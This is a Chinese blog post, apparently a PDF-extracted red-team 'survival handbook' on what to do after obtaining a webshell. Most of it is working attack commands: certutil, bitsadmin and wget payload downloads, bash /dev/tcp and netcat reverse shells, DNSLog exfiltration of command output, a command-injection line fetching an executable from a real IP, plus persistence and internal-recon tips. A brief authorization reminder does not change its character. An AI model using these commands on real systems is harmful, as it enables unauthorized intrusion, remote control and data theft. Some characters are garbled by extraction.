欢迎来到我的博客

��_�.🚀《红队生存手册：当命令不回显时，如 何把权限�偷�回来？》 副标题：从文件传输到内网横跳，一套让蓝队睡不着觉的实战渗透链 💡 这不是理论课，这是你在拿下 Webshell 后真正要用的“活命技能包”。 当图形界面是奢望、命令卡死无回显、防火墙如铜墙铁壁——别慌，这份笔记就是你的战术背包。 我们不仅告诉你“怎么打”，更讲清“为什么这么打”，以及“和普通扫描有啥本质区别”。 🔍 一、先搞清楚：你做的到底是“渗透测试”还是“漏洞扫描”？ 很多新手甚至从业者都混淆了这两者。它们的目标、深度和产出完全不同： 维度 常规漏洞扫描（如 Nessus / 真实渗透测试（红队行动） AWVS） 目标 发现已知漏洞（CVE、配置错 获取系统控制权，模拟真实攻击 误） 者 交互性 自动化、非交互式 高度交互、动态调整战术 输出 漏洞列表 + ⻛险等级 可执行的权限、内网拓扑、横向 路径、业务影响证明 典型场景 安全合规检查、季度巡检 红蓝对抗、攻防演练、HW 行动 关键能力 工具使用 命令行操控、协议理解、绕过思 维、应急响应预判 🧪 举个栗子： 扫描器视⻆：发现某网站存在 RCE 漏洞 → 报告：“远程命令执行（高危）”。 ● ● 渗透者视⻆：利用 RCE 执行 whoami → 无回显 → 立即切换 带外通道（DNSLog） 获取结果 336

→ 用 certutil 下载 nc.exe → 反弹 Shell → 提权 → 扫描内网 → 横向移动。 👉 前者止步于“发现问题”，后者致力于“掌控系统”。 📦 二、核心技能模块详解（基于你的原始笔记升级） 📥 场景 1：没有图形界面？文件怎么传？ 痛点：拿到 Webshell，但不能拖拽上传木⻢/工具。 ✅ 主流系统文件下载命令速查表 系统 命令（从你的 HTTP Server 下 特点 载） Linux wget http://IP/file -O 灵活，支持后台 file curl http://IP/file -o file python3 -c “import url lib.request;urllib.requ est.urlretrieve(‘htt p://IP/file’,‘file’)” Windows certutil -urlcache -f 绕过 AMSI、无落地（部分） http://IP/file file powershell IWR http:// IP/file -OutFile file bitsadmin /transfer jo b /download /priority n ormal http://IP/file %C D%\file 💡 小技巧：用 Python 快速启 HTTP 服务（你的笔记已提到）： 337

1 # Python 2 2 python -m SimpleHTTPServer 80 3 # Python 3 4 python3 -m http.server 80 🔄 场景 2：命令执行了，但屏幕一片空白？——“不回显”怎么办！ 这就是渗透测试 vs 扫描的本质分水岭！ 方案 A：反弹 Shell（Reverse Shell）——把控制权“送”出来 适用：目标可出站（访问外网） ● 原理：目标主动连接你的监听端口，建立交互式 Shell ● 命令示例： ● 1 # Linux 反弹到你的机器 2 bash -i >& /dev/tcp/YOUR_IP/4444 0>&1 1 :: Windows (需 nc.exe 或 msfvenom payload) 2 nc.exe YOUR_IP 4444 -e cmd 方案 B：带外数据回显（Out-of-Band, OOB）——“偷偷传情报” 适用：完全无回显 + 出站受限（仅 DNS/HTTP） ● 工具：dnslog.cn、Burp Collaborator ● 实战案例（来自你的笔记）： ● 1 # Linux：将 whoami 结果拼接到 DNS 请求 2 ping -c 1 (whoami).yourid.dnslog.cn 1 # Windows PowerShell（需处理反斜杠） 2 user = whoami; $clean =$user.Replace(”, ‘xxxx’); ping “$clean.yourid.dn slog.cn” ✅ 优势：即使 WAF 拦截响应体，只要能发起 DNS/HTTP 请求，就能“泄出”数据。 338

🔗 场景 3：正向 vs 反向连接？别再搞混了！ 类型 谁监听？ 谁连接？ 适用网络环境 防火墙挑战 正向连接（Bind 目标机监听端口 攻击机主动连接 目标有公网 IP， ❌ 入站规则常被 Shell） 且入站开放 严格限制 反向连接 攻击机监听端口 目标机主动连接 目标在内网，但 ✅ 出站策略通常 （Reverse 可出站 较宽松 Shell） 🎯 决策树： 339

能否拿到命令执行？ 是 是否有回显？ 有 无 直接交互 目标能否访问外网？ 能 不能 反弹 Shell 或 DNSLog 尝试 ICMP 隧道 / HTTP 隧道 / 代理转发 ⚠ 你的笔记提醒很关键：Win10 旧版防火墙若关闭任一方向（入/出），可能导致正反向均失效——务 必先探测网络连通性！ 🛑 场景 4：防火墙拦路？用“管道符”绕过！ 当 Web RCE 只允许单条命令，但你想干多件事？用 命令连接符！ 符号 作用 示例 340

; 顺序执行（Linux） ping -c 1 127.0.0.1; w hoami & 后台执行（Win/Linux） certutil … & whoami && 成功才执行下一步 cd /tmp && wget … 管道传递输出 🔥 组合技（来自你的实战）： 利用 | 绕过输入限制，同时完成下载。 1 127.0.0.1 | certutil -urlcache -f http://39.108.101.157/原神.exe c:\原神.exe 🧩 三、自主补充：你可能忽略但至关重要的点 � 权限维持 ≠ 上传后⻔ 更隐蔽的方式：计划任务（Windows）、systemd 服务（Linux）、Webshell 隐藏在图片 EXIF ● 推荐：使用 内存⻢（如 Java Agent、.NET Core Profiler），无文件落地 ● � 内网信息侦察优先级 拿下主机后，第一时间执行： 1 # Linux 2 ip a; route -n; cat /etc/resolv.conf; netstat -tulnp 3 # Windows 4 ipconfig /all; route print; netstat -ano; systeminfo � 法律与道德边界 所有操作必须在 书面授权范围内 ● 禁止对非目标资产进行探测（如 C 段扫描需明确授权） ● 报告中需包含 修复建议，而非仅展示“我能黑掉你” ● 341

� 工具推荐（开源免费） 反弹 Shell 生成：https://www.revshells.com ● 文件下载生成：你的棱⻆社区工具 ● ● 内网代理： chisel 、 frp 、 reGeorg 📝 结语：渗透测试的本质是“理解系统，而非破坏系统” 你不是在“黑”对方，而是在帮对方看清自⼰有多脆弱。 这份笔记里的每一条命令，都曾在一个深夜里，成为某位安全工程师的救命稻草。 愿你手握利器，心存敬畏。 ✅ 附：快速命令速查卡（可打印贴屏） 👉 点击此处生成个性化反弹 Shell / 文件下载命令 342